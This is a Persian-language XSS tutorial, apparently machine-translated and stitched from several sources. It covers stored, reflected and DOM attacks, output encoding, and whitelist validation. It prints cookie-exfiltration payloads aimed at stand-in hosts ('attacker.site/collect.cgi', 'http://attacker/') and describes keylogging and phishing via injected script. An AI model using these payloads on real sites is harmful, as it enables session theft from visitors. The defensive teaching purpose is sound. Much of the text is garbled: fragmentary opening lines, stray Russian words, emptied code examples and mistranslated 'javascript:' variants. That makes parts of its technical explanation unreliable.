حمله xss چیست؟ آسیب پذیری XSS چیست؟

خوش آمدی! هشدار سلام (document.cookie)

به سیستم ما خوش آمدید...

var viktima_window=open(","foobar");alert("قابل دسترسی:

"+victim_window.location.search)

پنجره.باز

("http://www.attacker.site/collect.cgi?cookie="+document.cookie)">

تا اینجا دیدیم که یک حمله XSS می تواند در پارامتر درخواست GET که اسکریپت به آن پاسخ می دهد رخ دهد. اما همچنین می توان با استفاده از درخواست POST یا با استفاده از مؤلفه مسیر درخواست HTTP و حتی با استفاده از برخی هدرهای HTTP (مثلاً Referer) یک حمله انجام داد.

به طور خاص، مؤلفه مسیر زمانی مفید است که صفحه خطا یک مسیر نامعتبر را برمی گرداند. در این مورد، گنجاندن یک اسکریپت مخرب در مسیر اغلب منجر به اجرای آن می شود. بسیاری از سرورهای وب در برابر این حمله آسیب پذیر هستند.

درک این نکته مهم است که اگرچه وب سایت مستقیماً تحت تأثیر این حمله قرار نمی گیرد (به طور معمول به کار خود ادامه می دهد، هیچ کد مخربی روی آن اجرا نمی شود، حمله DoS رخ نمی دهد، و داده های سایت مستقیما خوانده یا دستکاری نمی شوند. با)، همچنان یک نقض در سیستم امنیتی است که سایت به مشتریان یا بازدیدکنندگان خود ارائه می دهد. این شبیه به سایتی است که برای استقرار یک برنامه با برچسب های امنیتی ضعیف استفاده می شود. به همین دلیل، مهاجم می تواند برچسب امنیتی مشتری را حدس بزند و وانمود کند که او (یا او) است.

نقطه ضعف برنامه اسکریپت است که پارامتر آن را بدون توجه به مقدار آن برمی گرداند. یک اسکریپت خوب باید مطمئن شود که پارامتر در فرمت صحیح است، حاوی کاراکترهای معتبر و غیره است. معمولاً دلیلی وجود ندارد که یک پارامتر معتبر حاوی تگ های HTML یا کد جاوا اسکریپت باشد. قبل از اینکه در یک پاسخ تعبیه شود یا در یک برنامه کاربردی استفاده شود، آنها باید از یک پارامتر حذف شوند. این امر ایمنی را تضمین می کند.

سه راه برای ایمن سازی سایت شما در برابر حملات XSS وجود دارد.

• این نیاز به برنامه نویس برنامه دارد که دانش خوبی از فناوری های امنیتی داشته باشد.
• از برنامه نویس می خواهد که تمام منابع ورودی ممکن را پوشش دهد (پارامترهای درخواست، پارامترهای بدنه درخواست POST، هدرهای HTTP).
• نمی تواند در برابر آسیب پذیری های موجود در اسکریپت ها یا سرورهای شخص ثالث محافظت کند. به عنوان مثال، در برابر مشکلات در صفحات خطا در سرورهای وب (که مسیر منبع را نمایش می دهند) محافظت نمی کند.

نتیجه منطقی حفاظت از سایت، بررسی امنیت آن در برابر حملات XSS است. مانند محافظت از یک سایت در برابر XSS، بررسی های امنیتی را می توان به صورت دستی (راه سخت) یا با استفاده از یک ابزار خودکار ارزیابی آسیب پذیری برنامه کاربردی وب انجام داد. چنین ابزاری بار تأیید را از روی دوش شما برمی دارد. این برنامه از سایت عبور می کند و برای هر اسکریپتی که پیدا می کند، هر گونه تغییری را که می داند اجرا می کند. این همه پارامترها، هدرها و مسیرها را امتحان می کند. در هر دو روش، هر ورودی به برنامه (پارامترهای همه اسکریپت ها، هدرهای HTTP، مسیرها) با حداکثر گزینه ممکن بررسی می شود. و اگر صفحه پاسخ حاوی کد جاوا اسکریپت در زمینه ای باشد که مرورگر بتواند آن را اجرا کند، پیام آسیب پذیری XSS ظاهر می شود. به عنوان مثال هنگام ارسال متن زیر:

برای هر پارامتر هر اسکریپت (از طریق یک مرورگر با قابلیت جاوا اسکریپت برای شناسایی ساده ترین نوع آسیب پذیری XSS)، اگر متن به عنوان کد جاوا اسکریپت تفسیر شود، مرورگر یک پنجره هشدار جاوا اسکریپت ظاهر می شود. البته چندین گزینه وجود دارد. بنابراین، آزمایش تنها این گزینه کافی نیست. و همانطور که قبلاً یاد گرفتید، می توانید کد جاوا اسکریپت را در فیلدهای مختلف درخواست جاسازی کنید: پارامترها، هدرهای HTTP و مسیر. با این حال، در برخی موارد (به ویژه در مورد هدر HTTP Referer) انجام یک حمله مبتنی بر مرورگر ناخوشایند است.

اسکریپت بین سایتی یکی از رایج ترین حملات لایه برنامه است که هکرها از آن برای نفوذ به برنامه های وب استفاده می کنند. همچنین خطرناک ترین است. این حمله به حریم خصوصی مشتریان یک وب سایت خاص است. این می تواند منجر به تخریب کامل سیستم امنیتی شود، زمانی که داده های مشتری به سرقت رفته و بعداً برای اهدافی مورد استفاده قرار گیرد. متأسفانه، همانطور که این مقاله توضیح می دهد، این کار اغلب بدون اطلاع مشتری یا سازمانی که مورد حمله قرار گرفته است انجام می شود.

برای جلوگیری از آسیب پذیری وب سایت ها در برابر این فعالیت های مخرب، مهم است که یک سازمان یک استراتژی برای حفاظت آنلاین و آفلاین اجرا کند. این شامل یک بررسی خودکار آسیب‌پذیری است که می‌تواند تمام آسیب‌پذیری‌های وب شناخته‌شده و برنامه‌های خاص (مانند اسکریپت بین سایتی) را در یک سایت آزمایش کند. برای محافظت کامل آنلاین، نصب فایروالی که بتواند هر نوع دستکاری کد و داده‌های موجود در یا پشت سرورهای وب را شناسایی و مسدود کند، حیاتی است.

برچسب زدن

این تگ می تواند برای درج در یک اسکریپت از یک سایت خارجی استفاده شود.

آیا سایت شما در برابر اسکریپت های متقابل آسیب پذیر است؟

آسیب‌پذیری‌های XSS از رایج‌ترین آسیب‌پذیری‌های برنامه‌های وب در اینترنت هستند. خوشبختانه، بررسی اینکه آیا وب سایت یا برنامه وب شما در برابر XSS و سایر آسیب پذیری ها آسیب پذیر است یا نه، به سادگی با تماس با من آسان است. با هزینه ای ناچیز، منبع شما را با کمک برنامه های ویژه اسکن می کنم، آسیب پذیری های احتمالی را پیدا می کنم و نحوه رفع آنها را پیشنهاد می کنم.

و یک کتاب درسی جامع در زمینه اسکریپت بین سایتی است.

برنامه نویسی متقابل سایت ( انگلیسی اسکریپت نویسی متقابل سایت) یک حمله تزریق کد است که به مهاجم اجازه می دهد جاوا اسکریپت مخرب را در مرورگر کاربر دیگر اجرا کند.

مهاجم مستقیماً به قربانی خود حمله نمی کند. در عوض، از یک آسیب پذیری در وب سایتی که قربانی بازدید می کند سوء استفاده می کند و کد مخرب جاوا اسکریپت را تزریق می کند. در مرورگر قربانی، جاوا اسکریپت مخرب به عنوان بخشی قانونی از وب سایت ظاهر می شود و خود وب سایت به عنوان همدست مستقیم مهاجم عمل می کند.

تنها راه برای یک مهاجم برای اجرای جاوا اسکریپت مخرب در مرورگر قربانی تزریق آن به یکی از صفحاتی است که قربانی از وب سایت بارگذاری می کند. این در صورتی امکان پذیر است که وب سایت به کاربران اجازه دهد داده ها را در صفحات خود وارد کنند و مهاجم می تواند رشته ای را وارد کند که به عنوان بخشی از کد در مرورگر قربانی شناسایی می شود.

مثال زیر یک اسکریپت سرور ساده را نشان می دهد که برای نمایش آخرین نظر در یک سایت استفاده می شود:

چاپ ""
چاپ "آخرین نظر:"
چاپ پایگاه داده.latestComment
چاپ ""

اسکریپت فرض می کند که نظر فقط از متن تشکیل شده است. با این حال، از آنجایی که ورودی مستقیم کاربر فعال است، مهاجم می تواند این نظر را بگذارد: "..." . اکنون هر کاربری که از صفحه بازدید کند پاسخ زیر را دریافت خواهد کرد:

آخرین نظر:
...

هنگامی که مرورگر کاربر صفحه را بارگذاری می کند، همه چیز از جمله جاوا اسکریپت موجود در برچسب ها را اجرا می کند. مهاجم با موفقیت این حمله را انجام داد.

توانایی اجرای جاوا اسکریپت در مرورگر قربانی ممکن است به خصوص مخرب به نظر نرسد. جاوا اسکریپت در یک محیط بسیار محدود اجرا می شود که دسترسی بسیار محدودی به فایل های کاربر و سیستم عامل دارد. در واقع می توانید همین الان کنسول جاوا اسکریپت را در مرورگر خود باز کنید و هر جاوا اسکریپتی را که می خواهید اجرا کنید و بعید است که بتوانید آسیبی به رایانه خود وارد کنید.

با این حال، توانایی کد جاوا اسکریپت برای مخرب بودن با توجه به حقایق زیر واضح تر می شود:

• جاوا اسکریپت به برخی از اطلاعات حساس کاربر مانند کوکی ها دسترسی دارد.
• جاوا اسکریپت می تواند درخواست های HTTP را با محتوای دلخواه در جهت دلخواه با استفاده از XMLHttpRequest و مکانیسم های دیگر ارسال کند.
• جاوا اسکریپت می تواند با استفاده از روش های دستکاری DOM تغییرات دلخواه در کد HTML صفحه فعلی ایجاد کند.

هنگامی که این حقایق با هم ترکیب شوند، می توانند نقض امنیتی بسیار جدی ایجاد کنند، جزئیات در ادامه خواهد آمد.

علاوه بر این، توانایی اجرای جاوا اسکریپت دلخواه در مرورگر کاربر دیگر به مهاجم اجازه می دهد تا انواع حملات زیر را انجام دهد:

دزدی کوکی

مهاجم می‌تواند با استفاده از document.cookie به کوکی‌های مربوط به وب‌سایت قربانی دسترسی پیدا کند، آنها را به سرور خود ارسال کند و از آنها برای استخراج اطلاعات حساس مانند شناسه‌های جلسه استفاده کند.

کی لاگر

مهاجم می‌تواند با استفاده از addEventListener شنونده رویداد صفحه‌کلید را ثبت کند و سپس تمام کلیدهای کاربر را به سرور خود ارسال کند و احتمالاً اطلاعات حساسی مانند رمز عبور و شماره کارت اعتباری را ثبت کند.

فیشینگ

یک مهاجم می‌تواند با استفاده از دستکاری DOM، یک فرم ورود جعلی را در صفحه وارد کند، ویژگی‌های عملکرد فرم را روی سرور خودش تنظیم کند، و سپس کاربر را فریب دهد تا اطلاعات حساس را دریافت کند.

اگرچه این حملات تفاوت قابل توجهی دارند، اما همه آنها یک شباهت قابل توجه دارند: از آنجا که مهاجم کد را به صفحه ای که توسط یک وب سایت ارائه می شود تزریق می کند، جاوا اسکریپت مخرب در زمینه آن وب سایت اجرا می شود. این بدان معناست که با آن مانند هر اسکریپت دیگری از آن سایت رفتار می شود: به داده های قربانی برای آن وب سایت (مانند سوابق کوکی) دسترسی دارد و نام میزبان نمایش داده شده در رشته URL مانند وب سایت خواهد بود. برای همه اهداف، اسکریپت بخشی قانونی از وب سایت در نظر گرفته می شود، که به آن اجازه می دهد هر کاری را که خود وب سایت می تواند انجام دهد، انجام دهد.

این واقعیت یک مسئله کلیدی را برجسته می کند:

اگر یک مهاجم بتواند از وب سایت شما برای اجرای کد جاوا اسکریپت دلخواه در مرورگرهای دیگر کاربران استفاده کند، امنیت وب سایت شما و کاربران آن به خطر می افتد.

برای تأکید بر این نکته، برخی از نمونه‌های اسکریپت مخرب در این آموزش با استفاده از ... به تفصیل حذف می‌شوند. این نشان می‌دهد که صرف وجود یک اسکریپت که توسط مهاجم تزریق می‌شود، یک مشکل است، صرفنظر از اینکه کد اسکریپت خاصی واقعاً اجرا می‌شود.

قبل از اینکه به طور مفصل نحوه عملکرد یک حمله XSS را توضیح دهیم، باید عوامل دخیل در حمله XSS را تعریف کنیم. به طور کلی، سه بازیگر در حمله XSS وجود دارد: وب سایت، قربانی و مهاجم.

• وب سایت صفحات HTML را برای کاربرانی که آنها را درخواست می کنند ارائه می دهد. در مثال های ما، در http://website/ قرار دارد.
  • پایگاه داده وب سایت پایگاهی است که برخی از داده های وارد شده توسط کاربران را در صفحات یک وب سایت ذخیره می کند.
• قربانی کاربر معمولی یک وب سایت است که با استفاده از مرورگر خود صفحاتی را از آن درخواست می کند.
• مهاجم مهاجمی است که قصد دارد با سوء استفاده از یک آسیب پذیری XSS در یک سایت، به قربانی حمله کند.
  • سرور مزاحم یک وب سرور است که توسط مهاجم کنترل می شود و تنها هدف آن سرقت اطلاعات محرمانه قربانی است. در مثال‌های ما، در http://attacker/ قرار دارد.

window.location="http://attacker/?cookie="+document.cookie

این اسکریپت یک درخواست HTTP به URL دیگری ایجاد می کند که مرورگر کاربر را به سرور مهاجم هدایت می کند. URL شامل کوکی قربانی به عنوان پارامتر درخواست است، هنگامی که یک درخواست HTTP به سرور مهاجم می رسد، مهاجم می تواند این کوکی ها را از درخواست استخراج کند. هنگامی که مهاجم کوکی ها را به دست آورد، می تواند از آنها برای جعل هویت قربانی و راه اندازی یک حمله بعدی استفاده کند.

از این پس، HTML نشان داده شده در بالا به عنوان یک رشته مخرب یا اسکریپت مخرب شناخته می شود. درک این نکته مهم است که خود رشته تنها زمانی مخرب است که در نهایت به صورت HTML در مرورگر قربانی ارائه شود، که تنها در صورت وجود آسیب‌پذیری XSS در وب‌سایت ممکن است اتفاق بیفتد.

نمودار زیر نمونه ای از حمله توسط مهاجم را نشان می دهد:

هدف از حمله XSS همیشه اجرای یک اسکریپت جاوا اسکریپت مخرب در مرورگر قربانی است. چندین راه اساسی برای رسیدن به این هدف وجود دارد. حملات XSS اغلب به سه نوع طبقه بندی می شوند:

• ذخیره شده (دائم) XSS، جایی که رشته مخرب از پایگاه داده وب سایت منشا می گیرد.
• XSS منعکس شده (غیر پایدار)، که در آن رشته مخرب از درخواست قربانی ایجاد می شود.
• XSS DOM، جایی که آسیب‌پذیری در کد سمت سرویس گیرنده رخ می‌دهد، نه کد سمت سرور.

مثال قبلی یک حمله XSS ذخیره شده را نشان می دهد. ما اکنون دو نوع دیگر از حملات XSS را شرح خواهیم داد: حملات XSS منعکس شده و DOM XSS.

در یک حمله XSS منعکس شده، رشته مخرب بخشی از درخواست قربانی به وب سایت است. سایت می پذیرد و این رشته مخرب را در پاسخی که برای کاربر ارسال می کند درج می کند. نمودار زیر این سناریو را نشان می دهد:

چگونه یک حمله XSS منعکس شده را با موفقیت انجام دهیم؟

یک حمله XSS منعکس شده ممکن است بی ضرر به نظر برسد زیرا از قربانی می خواهد درخواستی حاوی رشته مخرب را از طرف خود ارسال کند. از آنجایی که هیچ کس داوطلبانه به خود حمله نمی کند، به نظر می رسد هیچ راهی برای انجام واقعی حمله وجود ندارد.

همانطور که مشخص است، حداقل دو راه متداول وجود دارد که قربانی را وادار به انجام یک حمله XSS منعکس شده علیه خود کنید:

• اگر کاربر یک فرد خاص باشد، مهاجم می‌تواند یک URL مخرب برای قربانی ارسال کند (مثلاً از طریق ایمیل یا پیام‌رسان) و او را فریب دهد تا پیوند را برای بازدید از وب‌سایت باز کند.
• اگر هدف گروه بزرگی از کاربران باشد، مهاجم می‌تواند پیوندی به یک URL مخرب (مثلاً در وب‌سایت یا شبکه اجتماعی خود) ارسال کند و منتظر بماند تا بازدیدکنندگان روی پیوند کلیک کنند.

هر دوی این روش‌ها مشابه هستند، و هر دو می‌توانند با سرویس‌های کوتاه‌کننده URL که رشته‌های مخرب را از کاربرانی که ممکن است قادر به شناسایی آن هستند پنهان کنند، موفق‌تر باشند.

XSS در DOM یک نوع حمله XSS ذخیره شده و منعکس شده است. در این حمله XSS، رشته مخرب توسط مرورگر قربانی پردازش نمی شود تا زمانی که جاوا اسکریپت واقعی وب سایت اجرا شود. نمودار زیر این سناریو را برای یک حمله XSS منعکس شده نشان می دهد:

در نمونه های قبلی از حملات XSS ذخیره شده و منعکس شده، سرور یک اسکریپت مخرب را در یک صفحه قرار می دهد، که سپس در پاسخ به قربانی ارسال می شود. وقتی مرورگر قربانی پاسخی را دریافت می‌کند، فرض می‌کند که اسکریپت مخرب بخشی از محتوای قانونی صفحه است و به طور خودکار آن را در حین بارگذاری صفحه، مانند هر اسکریپت دیگری اجرا می‌کند.

در مثال حمله DOM XSS، اسکریپت مخرب به عنوان بخشی از صفحه درج نمی شود. تنها اسکریپتی که در حین بارگذاری صفحه به طور خودکار اجرا می شود، بخش قانونی صفحه است. مشکل این است که این اسکریپت قانونی مستقیماً از ورودی کاربر برای افزودن HTML به صفحه استفاده می کند. از آنجایی که رشته مخرب با استفاده از innerHTML در صفحه وارد می شود، به عنوان HTML تجزیه می شود و باعث می شود اسکریپت مخرب اجرا شود.

این تفاوت کوچک است، اما بسیار مهم است:

• در XSS سنتی، جاوا اسکریپت مخرب زمانی که صفحه بارگیری می شود، به عنوان بخشی از HTML ارسال شده توسط سرور اجرا می شود.
• در مورد XSS در DOM، جاوا اسکریپت مخرب پس از بارگیری صفحه اجرا می‌شود و در نتیجه آن صفحه با جاوا اسکریپت قانونی به ورودی کاربر (شامل رشته مخرب) به روشی ناامن دسترسی پیدا می‌کند.

در مثال قبلی، نیازی به جاوا اسکریپت نیست. سرور می تواند تمام HTML را به تنهایی تولید کند. اگر کد سمت سرور حاوی آسیب‌پذیری نبود، وب‌سایت تحت تأثیر آسیب‌پذیری XSS قرار نمی‌گرفت.

با این حال، با پیشرفته تر شدن برنامه های کاربردی وب، صفحات HTML بیشتری با جاوا اسکریپت در سمت مشتری به جای سمت سرور تولید می شوند. در هر زمان، محتوا باید بدون بازخوانی کل صفحه تغییر کند، این با استفاده از جاوا اسکریپت امکان پذیر است. به ویژه، این مورد زمانی است که صفحه پس از درخواست AJAX به روز می شود.

این بدان معنی است که آسیب پذیری های XSS نه تنها در سمت سرور کد سایت شما، بلکه در سمت مشتری کد جاوا اسکریپت سایت شما نیز وجود دارد. بنابراین، حتی با کد سمت سرور کاملاً ایمن، ممکن است کد کلاینت پس از بارگیری صفحه، به‌طور ایمن ورودی کاربر را هنگام به‌روزرسانی DOM وارد نکند. اگر این اتفاق بیفتد، کد سمت سرویس گیرنده اجازه حمله XSS را بدون تقصیر کد سمت سرور می دهد.

یک مورد خاص از حمله XSS در DOM وجود دارد که در آن رشته مخرب هرگز به سرور وب‌سایت ارسال نمی‌شود: این زمانی اتفاق می‌افتد که رشته مخرب در بخشی از یک شناسه URL (هر چیزی بعد از نماد #) قرار می‌گیرد. مرورگرها این قسمت از URL را به سرور ارسال نمی کنند، بنابراین وب سایت نمی تواند با کد سمت سرور به آن دسترسی داشته باشد. کد سمت کلاینت اما به آن دسترسی دارد و بنابراین حمله XSS از طریق پردازش ناامن امکان پذیر است.

این مورد به شناسه قطعه محدود نمی شود. ورودی های کاربر دیگری وجود دارد که برای سرور نامرئی است، مانند ویژگی های جدید HTML5 مانند LocalStorage و IndexedDB.

به یاد بیاورید که XSS یک حمله تزریق کد است: ورودی کاربر به اشتباه به عنوان کد مخرب تفسیر می شود. برای جلوگیری از این نوع تزریق کد، مدیریت ورودی ایمن مورد نیاز است. برای یک توسعه دهنده وب، دو روش اساسی برای انجام پردازش ورودی امن وجود دارد:

• رمزگذاری تکنیکی است که اجازه می دهد ورودی کاربر فقط به عنوان داده تولید شود و به مرورگر اجازه نمی دهد آن را به عنوان کد پردازش کند.
• اعتبار سنجی راهی برای فیلتر کردن ورودی کاربر است به طوری که مرورگر آن را به عنوان کد بدون دستورات مخرب تفسیر می کند.

در حالی که این روش‌ها اساساً روش‌های پیشگیری XSS متفاوت هستند، اما چند ویژگی مشترک دارند که درک آنها هنگام استفاده از هر یک از آنها مهم است:

Context مدیریت ورودی ایمن باید بسته به جایی که از ورودی کاربر در صفحه استفاده می‌شود متفاوت باشد. ورودی/خروجی پردازش ورودی امن می تواند زمانی انجام شود که سایت شما ورودی (ترافیک ورودی) را دریافت کند یا درست قبل از اینکه سایت ورودی کاربر را در محتوای صفحه وارد کند (خروجی). پردازش ورودی ایمن Client/Server می‌تواند در سمت مشتری یا در سمت سرور انجام شود، هر گزینه در شرایط مختلف مورد نیاز است.

قبل از توضیح دقیق نحوه کدگذاری و اعتبار سنجی، هر یک از این نکات را شرح خواهیم داد.

زمینه های زیادی در یک صفحه وب وجود دارد که ورودی کاربر را می توان در آنها اعمال کرد. برای هر یک از آنها، قوانین خاصی باید رعایت شود تا ورودی کاربر نتواند از متن خود خارج شود و به عنوان کد مخرب تفسیر شود. موارد زیر رایج ترین زمینه ها هستند:

در تمام زمینه های توصیف شده، اگر ورودی کاربر قبل از اولین رمزگذاری یا اعتبارسنجی وارد شده باشد، آسیب پذیری XSS می تواند رخ دهد. یک مهاجم می تواند کد مخرب را به سادگی با قرار دادن یک جداکننده بسته برای این زمینه و به دنبال آن کد مخرب تزریق کند.

برای مثال، اگر در نقطه‌ای یک وب‌سایت ورودی کاربر را مستقیماً در یک ویژگی HTML داشته باشد، مهاجم می‌تواند با شروع ورودی خود با یک نقل قول، اسکریپت مخرب را تزریق کند، همانطور که در زیر نشان داده شده است:

با حذف همه نقل قول ها در ورودی کاربر می شد از این امر جلوگیری کرد و همه چیز خوب بود، اما فقط در این زمینه. اگر ورودی در زمینه دیگری درج شده باشد، جداکننده بسته متفاوت خواهد بود و تزریق امکان پذیر خواهد بود. به همین دلیل، مدیریت ورودی ایمن باید همیشه با زمینه ای که ورودی کاربر در آن درج می شود، تطبیق داده شود.

به طور غریزی، به نظر می رسد که XSS می تواند با رمزگذاری یا اعتبارسنجی تمام ورودی های کاربر به محض دریافت سایت ما، جلوگیری شود. به این ترتیب، هر رشته‌های مخرب هر زمان که در صفحه قرار گیرند خنثی می‌شوند و اسکریپت‌های تولید HTML دیگر نگران مدیریت امن ورودی کاربر نخواهند بود.

مشکل این است که همانطور که قبلا توضیح داده شد، ورودی کاربر را می توان در چندین زمینه در صفحه درج کرد. و هیچ راه آسانی برای تعیین اینکه ورودی کاربر به یک زمینه وارد می شود وجود ندارد - در نهایت چگونه درج می شود، و همان ورودی کاربر اغلب باید در زمینه های مختلف درج شود. با تکیه بر مدیریت ورودی ورودی برای جلوگیری از XSS، ما یک راه حل بسیار شکننده ایجاد می کنیم که مستعد خطا است. (نقل قول جادویی PHP منسوخ شده نمونه ای از چنین راه حلی است.)

درعوض، مدیریت ورودی خروجی باید خط دفاعی اصلی شما در برابر XSS باشد زیرا می‌تواند زمینه خاص ورودی کاربر را در نظر بگیرد. تا حدی، اعتبار سنجی ورودی می تواند برای افزودن یک لایه حفاظتی ثانویه استفاده شود، اما بعداً در مورد آن بیشتر توضیح خواهیم داد.

در اکثر برنامه های کاربردی وب مدرن، ورودی کاربر هم در سمت سرور و هم در سمت مشتری پردازش می شود. به منظور محافظت در برابر انواع XSS، مدیریت ورودی امن باید هم در کد سمت سرور و هم در کد سمت سرویس گیرنده انجام شود.

• به منظور محافظت در برابر XSS سنتی، مدیریت ورودی امن باید در کد سمت سرور انجام شود. این کار با استفاده از برخی از زبان های پشتیبانی شده توسط سرور انجام می شود.
• به منظور محافظت در برابر حمله XSS در DOM، جایی که سرور هرگز یک رشته مخرب دریافت نمی کند (به عنوان مثال، حمله قطعه شناسه که قبلاً توضیح داده شد)، مدیریت ورودی امن باید در کد سمت سرویس گیرنده انجام شود. این کار با جاوا اسکریپت انجام می شود.

اکنون که توضیح دادیم چرا زمینه اهمیت دارد، چرا تمایز بین پردازش ورودی ورودی و خروجی مهم است، و چرا پردازش ورودی امن باید در هر دو طرف انجام شود، هم در سمت مشتری و هم در سمت سرور، می‌توانیم به توضیح ادامه دهیم. چگونه دو نوع پردازش ورودی امن (رمزگذاری و اعتبارسنجی) واقعاً انجام می شود.

رمزگذاری راهی برای خروج از موقعیتی است که در آن مرورگر لازم است ورودی کاربر را فقط به عنوان داده تفسیر کند نه کد. محبوب ترین نوع رمزگذاری در توسعه وب، HTML Escapement است که کاراکترهایی مانند< и >V< и >به ترتیب.

شبه کد زیر نمونه ای از نحوه کدگذاری ورودی کاربر (ورودی کاربر) با استفاده از HTML escapement و سپس درج در صفحه با استفاده از اسکریپت سمت سرور است:

چاپ ""
چاپ "آخرین نظر:"
چاپ encodeHtml (userInput)
چاپ ""

اگر کاربر خط زیر را وارد کند ... ، HTML حاصل به شکل زیر خواهد بود:

آخرین نظر:
...

از آنجایی که تمام کاراکترهای دارای معنای خاص حذف شده اند، مرورگر هیچ بخشی از ورودی کاربر را مانند HTML تجزیه نمی کند.

هنگام انجام رمزگذاری سمت سرویس گیرنده، همیشه از جاوا اسکریپت استفاده می شود که دارای توابع داخلی است که داده ها را برای زمینه های مختلف رمزگذاری می کند.

هنگام انجام کدنویسی در کد سمت سرور خود، به ویژگی های موجود در زبان یا چارچوب خود تکیه می کنید. با توجه به تعداد زیاد زبان ها و فریمورک های موجود، این آموزش جزئیات کدنویسی در هیچ زبان یا فریم ورک سرور خاصی را پوشش نمی دهد. با این حال، ویژگی‌های کدگذاری جاوا اسکریپت که در سمت سرویس گیرنده استفاده می‌شوند، هنگام نوشتن کد سمت سرور نیز استفاده می‌شوند.

هنگام رمزگذاری ورودی کاربر سمت سرویس گیرنده با جاوا اسکریپت، چندین روش و ویژگی داخلی وجود دارد که به طور خودکار همه داده ها را به سبک حساس به زمینه رمزگذاری می کند:

آخرین زمینه ذکر شده در بالا (مقادیر در جاوا اسکریپت) در این لیست گنجانده نشده است زیرا جاوا اسکریپت راهی داخلی برای رمزگذاری داده هایی که در کد منبع جاوا اسکریپت گنجانده می شود ارائه نمی دهد.

حتی هنگام رمزگذاری، امکان استفاده از رشته های مخرب در برخی زمینه ها وجود دارد. مثال بارز آن زمانی است که از ورودی کاربر برای ارائه URL استفاده می شود، مانند مثال زیر:

document.querySelector("a").href = userInput

اگرچه مقدار مشخص شده در ویژگی href عنصر به طور خودکار آن را رمزگذاری می کند به طوری که چیزی بیش از مقدار مشخصه نمی شود، اما این به تنهایی مانع از وارد کردن یک URL که با "javascript:" شروع می شود، توسط مهاجم نمی شود. هنگامی که لینک کلیک می شود، صرف نظر از ساختار، جاوا اسکریپت جاسازی شده در URL اجرا می شود.

هنگامی که می خواهید کاربران بتوانند از بخشی از کدهای HTML موجود در صفحه استفاده کنند، رمزگذاری نیز راه حل کارآمدی نیست. یک مثال می تواند صفحه نمایه کاربر باشد که در آن کاربر می تواند از HTML سفارشی استفاده کند. اگر این HTML ساده کدگذاری شده باشد، صفحه نمایه فقط می تواند از متن ساده تشکیل شود.

در شرایطی مانند این، کدنویسی باید با اعتبار سنجی تکمیل شود که در ادامه به بررسی آن خواهیم پرداخت.

اعتبار سنجی عمل فیلتر کردن ورودی کاربر است به طوری که تمام قسمت های مخرب آن بدون نیاز به حذف همه کدهای موجود در آن حذف می شود. یکی از پرکاربردترین انواع اعتبارسنجی در توسعه وب به برخی از عناصر HTML (مانند و ) اجازه می دهد اما برخی دیگر (مانند ) را غیرمجاز می کند.

دو بررسی مشخصه اصلی وجود دارد که در اجرای آنها متفاوت است:

استراتژی طبقه بندی ورودی کاربر را می توان با استفاده از لیست سیاه یا لیست سفید طبقه بندی کرد. نتیجه اعتبار سنجی ورودی کاربر که به عنوان مخرب شناسایی شده است را می توان رد یا پاکسازی کرد.

به طور غریزی، انجام بررسی با تعریف یک الگوی ممنوعه که نباید در ورودی کاربر ظاهر شود، مناسب به نظر می رسد. اگر رشته ای با این الگو مطابقت داشته باشد، به عنوان نامعتبر علامت گذاری می شود. به عنوان مثال، به کاربران اجازه دهید URL های سفارشی را با هر پروتکلی به جز جاوا اسکریپت ارسال کنند: . این استراتژی طبقه بندی نامیده می شود لیست سیاه.

با این حال، لیست سیاه دو اشکال اساسی دارد:

دشواری توصیف دقیق مجموعه تمام رشته های مخرب ممکن معمولاً یک کار بسیار دشوار است. مثال خط مشی بالا را نمی توان با جستجوی زیر رشته "جاوا اسکریپت" با موفقیت اجرا کرد، زیرا رشته هایی مانند "جاوا اسکریپت:" (که در آن حرف اول با حروف بزرگ است) و "جاوا اسکریپت:" (جایی که حرف اول به صورت عددی کدگذاری می شود را از دست می دهد. مرجع شخصیت). منسوخ شدن حتی اگر یک لیست سیاه ایده آل ایجاد شود، اگر ویژگی جدیدی که به مرورگر اضافه می شود برای حمله استفاده شود، بی فایده خواهد بود. به عنوان مثال، اگر لیست سیاه برای اعتبار سنجی HTML قبل از معرفی ویژگی onmousewheel در HTML5 ایجاد شده باشد، آن (لیست سیاه) نمی تواند مانع از استفاده مهاجم از این ویژگی برای انجام یک حمله XSS شود. این نقص به ویژه در توسعه وب که شامل بسیاری از فناوری‌های مختلف است که دائماً در حال به‌روزرسانی هستند، اهمیت دارد.

به دلیل این کاستی ها، قرار دادن لیست سیاه به عنوان یک استراتژی طبقه بندی به شدت ممنوع است. قرار دادن لیست سفید به طور کلی یک رویکرد بسیار امن تر است که در ادامه توضیح خواهیم داد.

لیست سفیداساساً برعکس لیست سیاه: به جای تعیین یک الگوی ممنوعه، رویکرد لیست سفید یک الگوی مجاز را تعریف می کند و در صورت وجود آن ورودی را نامعتبر می کند. مطابقت ندارداین الگو

برخلاف لیست‌های سیاه، نمونه‌ای از فهرست‌های سفید این است که به کاربران اجازه می‌دهد URLهای سفارشی حاوی پروتکل‌های http: و https: را ارسال کنند، نه چیزی بیشتر. این رویکرد به طور خودکار URL را به عنوان نامعتبر علامت گذاری می کند اگر حاوی پروتکل جاوا اسکریپت: باشد، حتی اگر به صورت "جاوا اسکریپت:" یا "جاوا اسکریپت:" ارائه شود.

در مقایسه با لیست سیاه، لیست سفید دو مزیت اصلی دارد:

سادگی توصیف دقیق مجموعه رشته های ایمن معمولاً بسیار ساده تر از شناسایی مجموعه تمام رشته های مخرب است. این به ویژه در شرایط عمومی که ورودی کاربر باید شامل مجموعه بسیار محدودی از عملکردهای موجود در مرورگر باشد، کاربرد دارد. به عنوان مثال، لیست سفیدی که در بالا توضیح داده شد، به سادگی اجازه می دهد فقط از URL هایی با پروتکل های http: یا https: مجاز استفاده شود، و در اکثر مواقع این برای کاربران کافی است. دوام بر خلاف لیست سیاه، لیست سفید معمولاً با اضافه شدن یک ویژگی جدید به مرورگر منسوخ نمی شود. به عنوان مثال، اعتبار سنجی لیست سفید HTML اجازه می دهد تا تنها ویژگی های عنوان عناصر HTML ایمن باقی بمانند، حتی اگر آن (لیست سفید) قبل از معرفی ویژگی چرخه موس HTML5 طراحی شده باشد.

هنگامی که یک ورودی کاربر به عنوان نامعتبر (ممنوع) علامت گذاری شده است، یکی از دو اقدام می تواند انجام شود:

ورودی Reject به سادگی رد می شود و از استفاده آن در جای دیگری از سایت جلوگیری می کند. پاکسازی تمام قسمت‌های نامعتبر داده‌های ورودی حذف شده و ورودی باقی‌مانده طبق معمول در وب‌سایت استفاده می‌شود.

